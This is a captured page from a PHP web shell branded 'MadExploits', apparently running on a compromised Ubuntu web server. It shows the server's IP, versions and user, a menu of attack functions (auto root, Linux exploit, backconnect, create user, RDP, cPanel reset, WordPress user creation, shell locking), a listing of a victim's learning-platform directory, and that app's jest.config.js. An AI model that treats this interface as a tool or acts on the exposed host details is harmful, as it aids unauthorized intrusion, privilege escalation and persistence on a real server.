Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
internals
[ DIR ]
drwxr-xr-x
server
[ DIR ]
drwxr-xr-x
.editorconfig
208
B
-rw-r--r--
.eslintignore
114
B
-rw-r--r--
.eslintrc.js
4.03
KB
-rw-r--r--
.gitignore
31
B
-rw-r--r--
.nvmrc
12
B
-rw-r--r--
.prettierignore
103
B
-rw-r--r--
.prettierrc
151
B
-rw-r--r--
.stylelintrc
159
B
-rw-r--r--
babel.config.js
717
B
-rw-r--r--
jest.config.js
1.17
KB
-rw-r--r--
package-lock.json
1.27
MB
-rw-r--r--
package.json
8.52
KB
-rw-r--r--
tsconfig.eslint.json
328
B
-rw-r--r--
tsconfig.json
1.16
KB
-rw-r--r--
yarn-error.log
612.02
KB
-rw-r--r--
yarn.lock
858.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jest.config.js
module.exports = { preset: 'ts-jest/presets/js-with-babel', collectCoverageFrom: [ 'app/**/*.{js,jsx,ts,tsx}', '!app/**/*.test.{js,jsx,ts,tsx}', '!app/*/RbGenerated*/*.{js,jsx,ts,tsx}', '!app/app.tsx', '!app/global-styles.ts', '!app/*/*/Loadable.{js,jsx,ts,tsx}', ], coverageThreshold: { global: { statements: 98, branches: 91, functions: 98, lines: 98, }, }, moduleFileExtensions: ['ts', 'tsx', 'js'], globals: { 'ts-jest': { tsConfig: 'tsconfig.json', }, }, moduleDirectories: ['node_modules', 'app'], moduleNameMapper: { '.*\\.(css|less|styl|scss|sass)$': '<rootDir>/internals/mocks/cssModule.js', '.*\\.(jpg|jpeg|png|gif|eot|otf|webp|svg|ttf|woff|woff2|mp4|webm|wav|mp3|m4a|aac|oga)$': '<rootDir>/internals/mocks/image.js', }, setupFilesAfterEnv: [ '<rootDir>/internals/testing/test-bundler.js', '@testing-library/jest-dom/extend-expect', ], testRegex: 'tests/.*\\.test\\.(js|ts(x?))$', transform: { '^.+\\.(ts(x?)|js)$': 'ts-jest', }, snapshotSerializers: [], watchPlugins: [ 'jest-watch-typeahead/filename', 'jest-watch-typeahead/testname', ], };
Close